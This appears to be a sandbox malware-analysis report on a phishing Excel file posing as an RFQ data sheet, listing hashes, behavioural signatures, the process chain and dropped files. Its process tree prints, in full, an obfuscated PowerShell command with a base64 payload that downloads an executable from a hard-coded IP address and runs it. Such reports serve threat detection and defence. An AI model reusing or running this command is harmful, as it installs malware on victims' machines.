Overview
overview
10Static
static
3Pepsico Co...le.exe
windows7-x64
7Pepsico Co...le.exe
windows10-2004-x64
7$PLUGINSDI...LL.dll
windows7-x64
3$PLUGINSDI...LL.dll
windows10-2004-x64
3$PLUGINSDI...em.dll
windows7-x64
3$PLUGINSDI...em.dll
windows10-2004-x64
3RFQ Data S...FD.xls
windows7-x64
8RFQ Data S...FD.xls
windows10-2004-x64
10Analysis
-
max time kernel
101s -
max time network
113s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
13-08-2024 14:17
Static task
static1
Behavioral task
behavioral1
Sample
Pepsico Company Profile.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
Pepsico Company Profile.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/LangDLL.dll
Resource
win7-20240708-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/LangDLL.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/System.dll
Resource
win7-20240704-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/System.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
RFQ Data Sheet Technical Specifications Conditioning System Package_PFD.xls
Resource
win7-20240729-en
Behavioral task
behavioral8
Sample
RFQ Data Sheet Technical Specifications Conditioning System Package_PFD.xls
Resource
win10v2004-20240802-en
General
-
Target
RFQ Data Sheet Technical Specifications Conditioning System Package_PFD.xls
-
Size
327KB
-
MD5
cc61a84acf7b534e532fab431480c33c
-
SHA1
88b007d75f1f24d6001b9e9257dc97c800c78ba2
-
SHA256
9b1162db6e8c02d209e9de6803f5639e9994b2752efcdae10462b5cc008e8218
-
SHA512
2d7bbefb32432330080224c8a167321e1b89d777edbac30e8cb7bd396505b7fd03c316d89d0721b49ccded8d6ec1d9aa8879d0a58b520138a7e80018f412168f
-
SSDEEP
6144:IrwfU+iLch1FKYPEpAMcZ0MnADLVw0EAq6aQozyPpFSncaI2bnfjt4E:IrwaYZ1eAMcZD/rOmgUnfh4
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
mshta.exepowershell.exeflow pid Process 12 2668 mshta.exe 13 2668 mshta.exe 15 1020 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
Processes:
cmd.exepowershell.exepid Process 2124 cmd.exe 1020 powershell.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
cmd.exepowershell.execsc.execvtres.exeEXCEL.EXEmshta.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
EXCEL.EXEdescription ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Processes:
mshta.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid Process 1692 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid Process 1020 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid Process Token: SeDebugPrivilege 1020 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
EXCEL.EXEpid Process 1692 EXCEL.EXE 1692 EXCEL.EXE 1692 EXCEL.EXE 1692 EXCEL.EXE 1692 EXCEL.EXE -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
mshta.execmd.exepowershell.execsc.exedescription pid Process procid_target PID 2668 wrote to memory of 2124 2668 mshta.exe 32 PID 2668 wrote to memory of 2124 2668 mshta.exe 32 PID 2668 wrote to memory of 2124 2668 mshta.exe 32 PID 2668 wrote to memory of 2124 2668 mshta.exe 32 PID 2124 wrote to memory of 1020 2124 cmd.exe 34 PID 2124 wrote to memory of 1020 2124 cmd.exe 34 PID 2124 wrote to memory of 1020 2124 cmd.exe 34 PID 2124 wrote to memory of 1020 2124 cmd.exe 34 PID 1020 wrote to memory of 2624 1020 powershell.exe 35 PID 1020 wrote to memory of 2624 1020 powershell.exe 35 PID 1020 wrote to memory of 2624 1020 powershell.exe 35 PID 1020 wrote to memory of 2624 1020 powershell.exe 35 PID 2624 wrote to memory of 2704 2624 csc.exe 36 PID 2624 wrote to memory of 2704 2624 csc.exe 36 PID 2624 wrote to memory of 2704 2624 csc.exe 36 PID 2624 wrote to memory of 2704 2624 csc.exe 36
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\RFQ Data Sheet Technical Specifications Conditioning System Package_PFD.xls"1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1692
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C PoWeRSHElL.exe -ex byPass -NOp -w 1 -c DEVICecREdenTiaLdePLoyMeNT.Exe ; IeX($(IEX('[sYsteM.tExT.ENcOdinG]'+[ChAR]58+[char]58+'uTF8.GeTSTriNG([sYsTeM.convErT]'+[cHAR]58+[cHAr]0X3a+'FROmBAsE64stRInG('+[Char]0x22+'JFIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVSZEVGaU5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUXFhTkh6SyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlRWVRNcyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFB4LHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpCc3BBZ2pwLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJscm9yIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcXlHbHRHdnBtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTcyLjMxLjEyNC8xMDIvc2lob3N0LmV4ZSIsIiRFTlY6QVBQREFUQVxzaWhvc3QuZXhlIiwwLDApO3NUYVJ0LVNMZWVwKDMpO1N0YVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXHNpaG9zdC5leGUi'+[CHar]34+'))')))"2⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2124 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePoWeRSHElL.exe -ex byPass -NOp -w 1 -c DEVICecREdenTiaLdePLoyMeNT.Exe ; IeX($(IEX('[sYsteM.tExT.ENcOdinG]'+[ChAR]58+[char]58+'uTF8.GeTSTriNG([sYsTeM.convErT]'+[cHAR]58+[cHAr]0X3a+'FROmBAsE64stRInG('+[Char]0x22+'JFIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UeXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVSZEVGaU5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUXFhTkh6SyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlRWVRNcyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFB4LHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpCc3BBZ2pwLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJscm9yIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcXlHbHRHdnBtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTcyLjMxLjEyNC8xMDIvc2lob3N0LmV4ZSIsIiRFTlY6QVBQREFUQVxzaWhvc3QuZXhlIiwwLDApO3NUYVJ0LVNMZWVwKDMpO1N0YVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXHNpaG9zdC5leGUi'+[CHar]34+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1020 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aprxst35.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2624 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1C96.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1C95.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:2704
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
344B
MD59a6ab26a10dddbc558e03cd1752ae11b
SHA1b898ed796eeb645627b10e13221e851aa6f0b095
SHA256b9ed60f8f2b187d480ae021d696c44d9e2030783ba377a57965e70bd9ff42abe
SHA5129119bd9f375525d818d482edb168fca359342ae43efe6348adac51002f6fcd1eb02497eba98337bd478ac7950e82a378de2b252a9f9fa6f16901206be4335fb4
-
Filesize
717B
MD5822467b728b7a66b081c91795373789a
SHA1d8f2f02e1eef62485a9feffd59ce837511749865
SHA256af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\06B88E7F787D0F8E872CC6C5E3EDE59C
Filesize540B
MD55de53f4a295f90e8eb642baab06f3f5f
SHA1328ee5d389cffc047f4f5c5c0a0302057b1e1513
SHA256a818ebe5aaa8ce47075723b4941ceeb1a46f1c5b806c3fe22cc953cc8864edd9
SHA5126884d1de21900803548c99fa80820f95245ce8677707a9bca63bf8dc393aaefef4edd353de2357d681cb3044fceb784a47aa725ee8c402effc0abe2d46378245
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
Filesize192B
MD5a582529b83f614895bbfa998a0ef8008
SHA1fed6ad95e024414dd6947fd7a42755ba347cde94
SHA256f1be172d7aa2b7a5d24634781e938596b412654cd23e8a444750d5b2cd41d30d
SHA512d8f3534d508acffa9a69efb781379e3d48cedbcc8cd36d20b9a8f29317f8f3aca8cc9e01531a3c9950e1e51f05db9dd23e55721eeed6f895543bff2d736145c2
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD55837e7d45fddff6a8e84b87d45d8d584
SHA18f1b537929c96931c05034303e47b877c1cd84a7
SHA2561c726cacda3ffa9dff8224da4547c09894a328e021f3dff0b16a0e84bcdcc7b6
SHA5127fb43df825ecaa9ebf3092d8dcb871fa92377bdb69233ce1bf932ff992d5f6ae23ce24e064295ba20b099d1e3e48bb8fe88764858beac0e35255edef3075c8ea
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6GL24G53\102[1].hta
Filesize1KB
MD5b64748a3ff19a3a41dda0a24479feba1
SHA1214f99e54f9c4ca82c58533ec0f19372c4ff5a0d
SHA2562486cf9eb49712339f41e705da644a9b116e1df5a24727f53feed08239ebf6c3
SHA512f1d189ed38fea97d5e83b3cfc7c2847e079f4933582b440c4f80ab1b8f327e4d6bc7bb8cc53463a765577789c3282157e666be82d260237708e2f1e787f1d286
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
1KB
MD500a3a46203d25d88ce753c68cff1d7e0
SHA1eb5fd2b677f7a4bb54205ea8dabbd020827acf3b
SHA25672cf2e3cea8bdd25a2f4bbb6759bd4622a4f762e623fd6d5bd65e3e2ba92ab2e
SHA512965053fa055b965c6be3eebac50ddec8bd4681671d1e36294db7f68cff49c15992ea6234901f737a75f85bc04ae2fed68fc9bd280c02644e861dac0c2c23b161
-
Filesize
3KB
MD56a11a5974d903d8d24ce0988479895fe
SHA1ff201a474f6abc1a3cdbd70b48fc9fc3b9f07d87
SHA2566b3fe37cbbcf2ab4476b74c3307ea96984e6e0d159adb32e5f61940641cf26fa
SHA512ba0a3bdf0752f60e9d63354d133902570e13d25b65408c78cfff3c2bff1ac8789e3ec10912be2b207882c37eeadf73ecc4ea873abff4f6e64407d4cd779811d0
-
Filesize
7KB
MD5385a8c83b40ed2ab0cda902de993b227
SHA1af7428498d7cc6c21f94710b489d89d64364719e
SHA25667e51ea30d289f56c485faecb4c4259899da8d1a729474b23b1ae5135b36d72c
SHA51205a7ec570aa3a65326e3a517f694cf214d4f29a43e6b03061a3eaddf15f37538cb8525cb3f793b53600d8670df32e8f47ee8cbb7b988548584bb830aedb6454d
-
Filesize
73B
MD5521e5709ed4eda8034023be07e5cf95a
SHA13f4f6a540848058fb9798e152e8ea0666b11b13a
SHA256af7cef459a4e6001f46b565bfd8c47a1832912cc37d2452d26c59b66f03f425c
SHA512b3e625fdd2542937fdb37257675800baa5861fefb719fb89606bd494e4f78ad5b404486b1e4823fe51dd5cc5fae2ca9cc4f1e025e770586538c6aa81ed19c01b
-
Filesize
77KB
MD5266650595fa3336cd5a32d5a358b0c20
SHA10c796d03911dc58e9c5b86ef005ce0ac0b18ddf0
SHA25665fa7a5f70adf48536779bbe2f36a1428e0f7148fb11d2c2dfa2227e0954687a
SHA5128110f4169d80753ed71c8f0b16b7b9d0446a56215ec95eca0a5f39a5681620435ca35a702dc608f51dd6ce31dc3843e17dc05089f799b1c98a73c65843d804e3
-
Filesize
652B
MD5f3ccca29599d021d4d9e6e118c62fe2e
SHA1c98dc2ed28164cc6222ba5180e837366d0b952d4
SHA25655baac295103bc1ec22e506583b80c7e3e942d6227b0764ea7601bdc74a06d36
SHA512a4fa10fa0b1a594b67107a48635f7c9a5188b2b00b5ae434fc4ac6414588c15508f24d988b45848caeac0134da23bec4ffe2465413fd562613258a52be1b9138
-
Filesize
469B
MD557220b2eeaa41382314518f6265ca367
SHA19f06731273d30bacf322b5b172c7c2a59752cc9f
SHA2569b0c8ed3b425ff96fe8505490b3721b4d255e45c4a7972fa9bd75868603139dd
SHA5124999993df5eff3acee817c7883ac6ce61bb1ec801f7f4d512485713d96c76bf9a140400c75f17eb169c201170e4d1cc72b8ff4f17fdf3c9abe24443b83256658
-
Filesize
309B
MD5548d64ac687e8add8376640b6c7dcde9
SHA1266e40dcb90f6f10b6023f7a3bae341216b2af69
SHA2563d4a398baa6988a29f335cfe5cc18a8881bcd3b6e020ac0d0663993f7c8a47a9
SHA512d4129390ceabaa235348109f5404d4221f0e3a9998963447bc6b5e7ddea91819a668bc09f317e28a5b9b97692fc6fe7a2b391a9bee7ba6a4b1039783075bf433